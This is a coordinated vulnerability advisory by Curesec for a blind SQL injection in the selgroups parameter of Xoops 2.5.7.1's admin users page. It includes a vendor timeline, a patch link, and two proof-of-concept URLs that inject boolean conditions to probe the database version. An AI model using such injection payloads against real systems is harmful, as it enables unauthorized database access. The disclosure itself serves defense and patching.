Xoops 2.5.7.1: Blind SQL Injection
Date: 2016-01-28 09:46:071. Introduction
| Affected Product: | Xoops 2.5.7.1 |
| Fixed in: | Patch |
| Patch Link: | http://xoops.org/modules/news/article.php?storyid=6747 |
| Vendor Website: | http://xoops.org/ |
| Vulnerability Type: | Blind SQL Injection |
| Remote Exploitable: | Yes |
| Reported to vendor: | 11/21/2015 |
| Disclosed to public: | 01/28/2016 |
| Release mode: | Coordinated Release |
| CVE: | requested, but not assigned |
| Credits | Tim Coen of Curesec GmbH |
2. Overview
Xoops is a content management system written in PHP. In version 2.5.7.1, it is vulnerable to blind SQL Injection via the selgroups parameter when viewing users.
An admin account is required for successful exploitation.
3. Proof of Concept
http://localhost/xoops-2.5.7.1/htdocs/modules/system/admin.php?fct=users&selgroups=1 and substring(version(),1,1)=5 -> true http://localhost/xoops-2.5.7.1/htdocs/modules/system/admin.php?fct=users&selgroups=1 and substring(version(),1,1)=4 -> false
4. Solution
To mitigate this issue please apply the security patch:
http://xoops.org/modules/news/article.php?storyid=6747
Please note that a newer version might already be available.
5. Report Timeline
| 11/21/2015 | Informed Vendor about Issue (no reply) |
| 12/10/2015 | CVE requested, but not assigned |
| 12/10/2015 | Reminded Vendor of Disclosure Date |
| 12/11/2015 | Vendor requests more time |
| 01/02/2016 | Vendor releases patch |
| 01/28/2016 | Disclosed to public |